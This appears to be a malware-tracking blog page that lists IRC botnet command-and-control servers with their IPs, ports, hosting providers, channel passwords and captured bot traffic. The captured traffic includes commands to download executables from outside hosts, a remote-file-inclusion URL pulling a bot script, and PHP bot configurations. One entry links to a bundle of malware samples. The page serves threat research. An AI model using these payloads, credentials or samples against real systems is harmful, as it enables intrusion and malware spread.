Remote Host Port Number 204.93.197.141 4244 NICK new[iRooT-XP-USA]865300 USER 6216 “” “TsGh” :6216 JOIN #!N!# AFK PRIVMSG #!N!# :[Botkiller] Searching for targets! Just a moment… 204.93.197.141:4244 Nick: new[iRooT-XP-AUT]574292 Username: 5742 Joined Channel: #!N!# with Password AFK Channel Topic for Channel #!N!#: “.Msn http://goo.gl/bJOJU” Private Message to User new[iRooT-XP-AUT]574292: “VERSION” hosting infos: http://whois.domaintools.com/204.93.197.141
94.23.239.37(AryaN bot hosted in France Ovh Systems)
Remote Host Port Number 199.15.234.7 80 94.23.239.37 3211 PASS NICK New{US-XP-x86}8408410 USER 17408 “” “14403” :26795 MODE New{US-XP-x86}8408410 +iMm JOIN #zZ~AryaN~Zz# hosting infos: http://whois.domaintools.com/94.23.239.37
cash.hi5fotos.info(ngrBot hosted in China Wuhan Niantong)
Resolved : [cash.hi5fotos.info] To [61.31.99.67] Resolved : [cash.hi5fotos.info] To [64.69.44.51] Resolved : [cash.hi5fotos.info] To [58.19.130.52] Remote Host Port Number 195.122.131.7 80 199.15.234.7 80 64.62.243.90 80 58.19.130.52 4042 PASS ngrBot or PASS owned 64.69.44.51 4042 PASS ngrBot or PASS owned 61.31.99.67 4042 PASS ngrBot or PASS owned JOIN #US PRIVMSG #boss :[d=”http://tinyurl.com/434fj6q”] Error downloading file [e=”12039″]Read more...
204.188.231.133(ngrBot hosted in United States Missoula Sharktech Internet Services)
Remote Host Port Number 199.15.234.7 80 82.165.102.141 80 204.188.231.133 19207 PASS ngrBot NICK n{US|XPa}jdkpmyd USER jdkpmyd 0 0 :jdkpmyd JOIN ##cybercenter## ngrBot PRIVMSG ##cybercenter## :[d=”http://www.cadelcucco.com/downloads/tmp3.exe” s=”172032 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataDcxaxd.exe” – Download retries: 0 * The data identified by the following URLs was then requested from the remote web server: oRead more...
unknownpredator.info(irc botnet hosted in Russian Federation Ispsystem Cjsc)
Remote Host Port Number 188.120.254.57 8080 Remote Host Port Number 188.120.254.57 7777 PASS secret 199.15.234.7 80 NICK n{US|XPa}znogzpt USER znogzpt 0 0 :znogzpt JOIN #NGR bignut NICK *N*{GodBot}{XP-USA}907674 USER 0364 “” “TsGh” :0364 NICK {GodBot}{XP-USA}556449 USER 5564 “” “TsGh” :5564 JOIN ##Bots gtfo Remote Host Port Number 188.120.254.57 1234 PASS .. 199.15.234.7 80 NICK n{US|XPa}zqohkznRead more...
221.206.88.199(irc botnet hosted in China Heilongjiang China Unicom Heilongjiang Province Network)
Remote Host Port Number 199.15.234.7 80 31.184.237.239 80 221.206.88.199 3321 PASS eee 221.206.88.199 3800 PRIVMSG #ng :[d=”http://31.184.237.239/69.exe” s=”196608 bytes”] Download error: MD5 mismatch (FD44BA3C13BE15D6DD0990B909F35322 != !DL) #us PASS hax0r hosting infos: http://whois.domaintools.com/221.206.88.199
devilz.com.mx(irc bot Z3R0x aspergillus mod hosted in Panama Panamaserver.com)
Resolved : [devilz.com.mx] To [200.63.45.21] gorditabonita.sytes.net 7171 Remote Host Port Number 200.63.45.21 7171 PASS none NICK [2947|USA|XP|Z3R0x] USER 2947 “” “lol” :2947 JOIN #USB2 gorda01 PONG :irc.puta.org hosting infos: http://whois.domaintools.com/200.63.45.21
45mb malware samples
Another package with diferent malwares like spyeye samples,ransomwares,irc bots etc have fun Download: http://adf.ly/2KF81
220.227.154.11(irc botnet hosted in India Navi Mumbai Rcom-static-dia)
Remote Host Port Number 220.227.154.11 3121 PASS google_cache2.tmp NICK new[iRooT-XP-USA]546915 USER 5469 “” “TsGh” :5469 JOIN #scan# hosting infos: http://whois.domaintools.com/220.227.154.11
irc.tux-family.com(linux bots hosted in United States Dallas Theplanet.com Internet Services Inc)
var $config = array(“server”=>”207.44.182.29”, “port”=>”6667”, “pass”=>””, “prefix”=>”[BOTNET]”, “maxrand”=>”6”, “chan”=>”#theowners”, “chan2″=>”#”, “key”=>””, “modes”=>”+p”, “password”=>”jorge”, “trigger”=>”.”, “hostauth”=>”*” var $config = array(“server”=>”207.44.182.29”, “port”=>”6667”, “pass”=>””, “prefix”=>”botnet”, “maxrand”=>”6”, “chan”=>”#haxixe”, “chan2″=>”#”, “key”=>”*”, “modes”=>”+p-ix”, “password”=>”Maconha”, “trigger”=>”.”, “hostauth”=>”*” Now talking in # ([botnet304407) [uname!]: Linux s227.xrea.com 2.4.32 #5 Tue Feb 14 01:43:10 JST 2006 i686 (safe: on) ([botnet304407) [vuln!]: http://www.agua-japan.com/renheren/modules/xfsection//modify.php?dir_module=http://haxixe.t35.com/tbot.txt? ([botnet752802) [uname!]: LinuxRead more...